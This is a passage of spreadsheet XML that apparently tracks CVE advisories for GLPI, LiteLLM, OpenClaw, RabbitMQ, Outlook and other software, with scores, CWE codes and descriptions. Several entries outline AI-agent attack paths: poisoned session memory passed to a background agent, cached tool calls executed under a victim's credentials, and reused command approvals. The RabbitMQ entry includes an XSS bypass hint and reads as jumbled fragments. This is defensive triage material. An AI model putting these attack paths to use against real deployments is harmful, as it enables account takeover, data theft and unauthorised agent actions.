          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98156</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49470</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, the time-based one-time password verification endpoint does not limit failed submissions per user. An attacker who has obtained a user's primary authentication credentials can repeatedly submit TOTP values against the MFA verification flow, making brute-force compromise of the second factor and subsequent account takeover possible. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49470</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89032</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>BerriAI LiteLLM before 1.101.0-rc.1 contains a tenant isolation bypass vulnerability in the semantic cache layer that allows authenticated users to read other tenants' cached responses by exploiting a metadata key mismatch between _get_semantic_cache_tenant_scope() and _get_metadata_variable_name(). Attackers holding a valid virtual key can submit semantically similar prompts on affected routes such as /v1/responses and /bedrock/* to retrieve cached responses containing other tenants' personally identifiable information, financial data, or source code, and can cause agentic front-ends to auto-execute attacker-supplied tool calls under victim credentials by returning cached function_call or tool_calls payloads to a different principal.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89032</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100578</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to restrict owner-only infrastructure tools exposed through the chat.send endpoint. In Gateway deployments using authentication modes that honor caller identity and narrower operator scopes, a write-scoped non-owner caller can start a chat turn whose tool inventory includes the `gateway` and `cron` tools, causing the agent to invoke owner-only configuration or scheduling operations, including persistent state changes. Practical impact depends on the tools selected by the model and the caller's ability to steer the turn. Shared-secret token and password callers are treated as fully trusted operators under OpenClaw's security model and are outside the scope of this issue. The issue is fixed in 2026.7.1; as a workaround, restrict chat.send to administrators in identity-bearing deployments and remove `gateway` and `cron` from affected agent tool policies.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100578</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100579</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 incorrectly trusts requester provenance in message.action. In identity-bearing Gateway deployments (authentication modes that honor caller identity and narrower operator scopes), a write-scoped caller can supply another sender's identifier to the channel authorization checks and invoke a channel action under that spoofed requester identity, reaching operations the channel adapter would have denied to the real caller. Practical impact depends on the enabled channel, the action, and the target account's permissions. Shared-secret token and password callers are full trusted operators under OpenClaw's security model and are out of scope. The issue is fixed in 2026.7.1; as a workaround, restrict message.action to administrators and disable sensitive channel actions that rely on requester identity.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100579</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67239</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3, Stored XSS via TLS peer-certificate DN in stream-management UI (sibling of V-11). lines 102/106/110 render peercertsubject / peercertissuer with raw &lt;%= %&gt; and no fmtstring(). RFC4514 backslash-escaping of &lt;/&gt; is HTML-inert and bypassable (&lt;img ... //&gt;). Requires non-default config: a stream TLS listener with verifypeer and an attacker-obtainable trusted cert with a malicious Same as the connection.ejs finding, against operators viewing the stream-connection detail rabbitmqstream + rabbitmqstreammanagement enabled with a TLS listener using verifypeer Attacker can obtain a certificate signed by a CA the listener trusts, with attacker-chosen DN An operator views the. This issue is fixed in versions 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67239</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84893</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to SQL injection in the PESI service. An authenticated attacker could exploit this vulnerability to access sensitive information in the internal database.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84893</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100208</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100208</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100535</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.4.5 and &lt; 2026.8.1 can lose the originating requester's restrictions and untrusted provenance when session-derived text is persisted to session memory. In deployments where session-memory capture and dreaming are enabled, a restricted external sender whose messages are admitted with limited tools can persist instructions that are later supplied to an unattended background (dreaming) agent holding broader file and command capabilities, allowing actions beyond the authority of the original turn and affecting files, commands, or services available to that agent. Exploitation requires the content to be captured, selected for later processing, and followed by the model. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100535</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100541</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Matrix integration (npm package @openclaw/matrix) versions &gt;= 2026.2.2 and &lt; 2026.8.1 lowercase complete Matrix user IDs — including historical localparts and the case-sensitive server-name portion — when deriving the OpenClaw authorization identity. As a result, distinct authenticated Matrix accounts can normalize to the same authorization identity. A Matrix participant controlling a colliding account identifier (a protocol-valid identifier that differs from the configured one only by characters OpenClaw case/Unicode folds; display-name matching is not required) can inherit allowlist, owner-command, exec-approval, or plugin-approval authority configured for another account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100541</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100543</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>npm, go, gin</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.8.1 could include deterministic hashes computed over the original, unredacted configuration in redacted configuration responses. When the Gateway password had low entropy and the remaining configuration values were reconstructable, these hashes acted as offline password verifiers: a caller able to obtain the redacted configuration (for example via config.get) could test password candidates offline without going through the rate-limited Gateway authentication path. Recovering the password could grant the documented shared-secret operator authority. Secret references were not affected in the same way. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100543</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100558</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a resource exhaustion vulnerability in the Gateway listener that allows unauthenticated clients to retain response sockets by sending WebSocket upgrade requests without matching connection semantics. Attackers can repeatedly send malformed upgrade requests to exhaust listener resources and cause denial of service without consuming the WebSocket pre-auth connection budget.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100558</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100560</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability where Allow Always approvals for exact commands persist as path-only grants on macOS and Linux. Attackers can reuse the same executable with different arguments to execute commands without triggering new approval prompts, potentially accessing files or internal services.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100560</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10758</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Esri LERC is an open-source image or raster format which supports rapid encoding and decoding for any pixel type. A Heap based Out-of-Bounds Write via Integer Overflow in LERC versions 4.1.0 and earlier may allow a remote, unauthenticated attacker who can pass specifically crafted attacker controlled imagery to an application that uses LERC to crash the application, leading to a denial of service.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10758</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13456</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>php, go, gin, hp</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.9.8 via the 'page' parameter parameter. This makes it possible for authenticated attackers, with subscriber-level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t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13456</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49850</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Invoices::delete() and Invoices::delete_invoice_tax() as state-changing routes without requiring POST and validating a CSRF token. When an authenticated administrator loads attacker-controlled content that requests an affected route, the application can delete an invoice or invoice tax record. The cross-origin action can remove financial data without the administrator's intent. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49850</t>
        </is>
      </c>
    </row>
    <row r="137">
